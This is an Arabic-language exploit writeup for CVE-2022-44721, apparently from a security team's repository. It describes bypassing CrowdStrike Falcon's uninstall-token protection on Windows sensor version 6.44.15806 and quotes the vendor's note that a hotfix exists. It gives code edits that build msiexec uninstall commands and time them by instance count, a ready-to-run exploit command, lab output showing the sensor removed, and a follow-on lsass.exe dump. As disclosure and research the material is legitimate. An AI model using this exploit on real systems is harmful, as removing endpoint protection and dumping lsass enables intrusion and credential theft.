
استغلال لـ CVE-2022-44721 يتجاوز فحص رمز الحماية من إلغاء التثبيت لـ CrowdStrike Falcon على ويندوز، مما يسمح للمهاجمين بصلاحيات المسؤول بإزالة مستشعر EDR/AV.
CrowdStrike Falcon هو حل كشف واستجابة للنقاط النهائية (EDR) ومكافحة فيروسات (AV) يعمل بالطاقة السحابية. يتم نشر مستشعر مُدار على مستوى النواة على كل جهاز نهائي، ويستفيد من الإمكانيات السحابية. يمكن تكوين المستشعر بحماية من الإلغاء. تمنع هذه الحماية إلغاء تثبيت مستشعر CrowdStrike Falcon على الجهاز النهائي دون رمز مميز يُولَّد لمرة واحدة.
استغلال هذه الثغرة يسمح للمهاجم بصلاحيات إدارية بتجاوز فحص الرمز المميز على أجهزة Windows النهائية وإلغاء تثبيت المستشعر من الجهاز دون إذن مناسب، مما يزيل فعليًا حماية EDR وAV من الجهاز.
إصدار المستشعر المعرض للخطر: 6.44.15806
مقتطف من بريد الإقرار من فريق دعم Crowdstrike
...
As the referenced CVE was not released in coordination with CrowdStrike, it may be missing some details, however our customers
have been kept up to date on our remediation efforts and the affected sensor versions, including a release of the hotfix for v6.44.15806.
Please see the relevant tech alerts explaining the nature of this issue and the fix releases at
https://supportportal.crowdstrike.com/s/article/Tech-Alert-Uninstall-Protection-Bug-in-Falcon-Sensor-for-Windows
Therefore, I believe you can go ahead and publish the CVE adding the impacted Sensor versions
we were able to test and confirm they are affected.
...
كما ورد في البريد الإلكتروني، قامت Crowdstrike بالفعل بإصلاح الإصدارات المعرضة للخطر.
# edit #1
Line 111: std::string cmd = "cmd /c start msiexec /x " + guid;
# edit #2
Line 67: if (g_msiexec_instance_count == 3 || g_msiexec_instance_count == 5) {
.\Falcon-6.44.15806-uninstall.exe "C:\ProgramData\Package Cache\{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}v6.44.15806\CsAgent.msi"
اسم جهاز الاختبار: MOANA
السياسات: EXTRA AGGRESSIVE (جميع الخيارات مُمكَّنة)

إلغاء التثبيت قيد التقدم...

اكتمل إلغاء التثبيت (لم يعد هناك أي ملفات داخل دليل Crowdstrike) - إعادة التشغيل مطلوبة إذا كانت الخدمة الخلفية (daemon) لا تزال نشطة في الذاكرة وقيد التشغيل (سيؤدي ذلك إلى توليد اكتشافات)

نتائج Moana غير قابلة للوصول عبر السحابة

تفريغ (Dump) لـ lsass.exe

Fortunato [fox] Lodari, Raffaele Nacca, Walter Oberacher, Davide Bianchin, Luca Bernardi @ فريق الأمن السيبراني في Deda Cloud